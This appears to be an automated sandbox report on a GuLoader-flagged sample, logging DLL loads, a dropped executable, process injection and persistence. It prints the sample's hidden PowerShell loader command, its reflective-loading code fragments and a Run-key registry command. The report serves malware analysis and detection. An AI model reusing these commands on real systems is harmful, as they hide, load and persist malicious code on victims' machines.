Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Jordbesiddere% -windowstyle minimized $Udslettelser=(Get-ItemProperty -Path 'HKCU:\Oplukkelig\').Bractlets52;%Jordbesiddere% ($Udslettelser)"	Jump to behavior
Source: C:\Program Files (x86)\sEJDEpyTeSxewOooeRadmzQMlGrduucsDOBgUXvZgbKQZOmzVCeuxoLKpsMjHmdscHscPwRhljcolWq\GjMghjdydYRuCpMLokUCwhVfwlj.exe	Process created: C:\Windows\SysWOW64\Magnify.exe "C:\Windows\SysWOW64\Magnify.exe"	Jump to behavior
Source: C:\Program Files (x86)\sEJDEpyTeSxewOooeRadmzQMlGrduucsDOBgUXvZgbKQZOmzVCeuxoLKpsMjHmdscHscPwRhljcolWq\GjMghjdydYRuCpMLokUCwhVfwlj.exe	Process created: C:\Windows\SysWOW64\wlanext.exe "C:\Windows\SysWOW64\wlanext.exe"	Jump to behavior

Source: C:\Users\user\Desktop\SwiftCopy_23052024.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\SwiftCopy_23052024.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\SwiftCopy_23052024.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SwiftCopy_23052024.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\SwiftCopy_23052024.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SwiftCopy_23052024.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\SwiftCopy_23052024.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\SwiftCopy_23052024.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\SwiftCopy_23052024.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\SwiftCopy_23052024.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\SwiftCopy_23052024.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\SwiftCopy_23052024.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\SwiftCopy_23052024.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SwiftCopy_23052024.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\SwiftCopy_23052024.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\SwiftCopy_23052024.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\SwiftCopy_23052024.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\SwiftCopy_23052024.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\SwiftCopy_23052024.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\SwiftCopy_23052024.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\SwiftCopy_23052024.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\SwiftCopy_23052024.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\SwiftCopy_23052024.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\SwiftCopy_23052024.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\SwiftCopy_23052024.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\sEJDEpyTeSxewOooeRadmzQMlGrduucsDOBgUXvZgbKQZOmzVCeuxoLKpsMjHmdscHscPwRhljcolWq\GjMghjdydYRuCpMLokUCwhVfwlj.exe	Section loaded: wininet.dll	Jump to behavior

Source: C:\Users\user\Desktop\SwiftCopy_23052024.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\SwiftCopy_23052024.exe

File written: C:\Users\user\AppData\Local\Temp\acrometer.ini

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: SwiftCopy_23052024.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: .Automation.pdb source: powershell.exe, 00000002.00000002.2185214744.0000000002793000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mshtml.pdb source: Tabsgivende.exe, 00000012.00000001.2023172133.0000000000649000.00000020.00000001.01000000.00000009.sdmp
Source:	Binary string: wntdll.pdbUGP source: Tabsgivende.exe, 00000012.00000002.2375399703.00000000224F0000.00000040.00001000.00020000.00000000.sdmp, Tabsgivende.exe, 00000012.00000003.2245564278.0000000022346000.00000004.00000020.00020000.00000000.sdmp, Tabsgivende.exe, 00000012.00000003.2243316011.0000000022199000.00000004.00000020.00020000.00000000.sdmp, Tabsgivende.exe, 00000012.00000002.2375399703.000000002268E000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: Tabsgivende.exe, Tabsgivende.exe, 00000012.00000002.2375399703.00000000224F0000.00000040.00001000.00020000.00000000.sdmp, Tabsgivende.exe, 00000012.00000003.2245564278.0000000022346000.00000004.00000020.00020000.00000000.sdmp, Tabsgivende.exe, 00000012.00000003.2243316011.0000000022199000.00000004.00000020.00020000.00000000.sdmp, Tabsgivende.exe, 00000012.00000002.2375399703.000000002268E000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wlanext.pdb source: Tabsgivende.exe, 00000012.00000003.2301820383.00000000066AF000.00000004.00000020.00020000.00000000.sdmp, Tabsgivende.exe, 00000012.00000003.2301840277.0000000022211000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.2185214744.0000000002793000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ore.pdbL source: powershell.exe, 00000002.00000002.2197326170.0000000007F32000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mshtml.pdbUGP source: Tabsgivende.exe, 00000012.00000001.2023172133.0000000000649000.00000020.00000001.01000000.00000009.sdmp
Source:	Binary string: em.Core.pdb source: powershell.exe, 00000002.00000002.2197326170.0000000007F32000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: CallSite.Targetore.pdb source: powershell.exe, 00000002.00000002.2197326170.0000000007F32000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb%B source: powershell.exe, 00000002.00000002.2197326170.0000000007F32000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wlanext.pdbGCTL source: Tabsgivende.exe, 00000012.00000003.2301820383.00000000066AF000.00000004.00000020.00020000.00000000.sdmp, Tabsgivende.exe, 00000012.00000003.2301840277.0000000022211000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Yara detected GuLoader

Source: Yara match

File source: 00000002.00000002.2198487086.0000000009E4D000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Found suspicious powershell code related to unpacking or dynamic code loading

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: GetDelegateForFunctionPointer((Tandpastaer $Varmefrontens $Amorin), (Squamaceous @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Ozzy = [AppDomain]::CurrentDomain.GetAssemblies()$global:
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Farvemssigt)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Friktioners, $false).DefineType($Aristokratis

Obfuscated command line found

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c set /A 1^^0"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c set /A 1^^0"			Jump to behavior

Suspicious powershell command line found

Source: C:\Users\user\Desktop\SwiftCopy_23052024.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Lommeregnerens178=Get-Content 'C:\Users\user\AppData\Roaming\fertiliseringer\Forbrug\Venstrehaandsarbejdet.Uns';$Industrivirksomhederne=$Lommeregnerens178.SubString(7349,3);.$Industrivirksomhederne($Lommeregnerens178)"
Source: C:\Users\user\Desktop\SwiftCopy_23052024.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Lommeregnerens178=Get-Content 'C:\Users\user\AppData\Roaming\fertiliseringer\Forbrug\Venstrehaandsarbejdet.Uns';$Industrivirksomhederne=$Lommeregnerens178.SubString(7349,3);.$Industrivirksomhederne($Lommeregnerens178)"			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_0447AA05 pushfd ; retn 0007h	2_2_0447AA2A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_044794F7 push eax; ret	2_2_044794FA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_044794FB push eax; ret	2_2_04479502
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_04479581 push ecx; ret	2_2_04479582
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_04479589 push ecx; ret	2_2_0447958A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_044796BB pushad ; retn 0007h	2_2_044796CA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_04479365 push edx; retn 0007h	2_2_0447936A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_0447936F push ebx; retn 0007h	2_2_0447938A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_04479335 push edx; retn 0007h	2_2_0447935A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_044793CF push esp; retn 0007h	2_2_044793CA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_044793E5 push esi; retn 0007h	2_2_044793EA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_044793EF push edi; retn 0007h	2_2_044793FA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_044793BB push esp; retn 0007h	2_2_044793CA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_04479D98 pushad ; ret	2_2_04479E4A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_04479975 push ebx; ret	2_2_044799A2
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_044799A9 push ebx; ret	2_2_044799AA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_06FEC35C push eax; ret	2_2_06FEC35D
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_08882E98 push cs; iretd	2_2_08882F17
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_088836C8 push ecx; retf	2_2_088836D2
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_088807D3 push esp; iretd	2_2_088807EC
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_08882F0E push cs; iretd	2_2_08882F17
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225209AD push ecx; mov dword ptr [esp], ecx	18_2_225209B6
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_016607D3 push esp; iretd	18_2_016607EC
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_016636C8 push ecx; retf	18_2_016636D2
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_01662F0E push cs; iretd	18_2_01662F17
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_01662E98 push cs; iretd	18_2_01662F17

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe

Jump to dropped file

Source: C:\Windows\SysWOW64\reg.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Startup key			Jump to behavior
Source: C:\Windows\SysWOW64\reg.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Startup key			Jump to behavior

Source: C:\Users\user\Desktop\SwiftCopy_23052024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
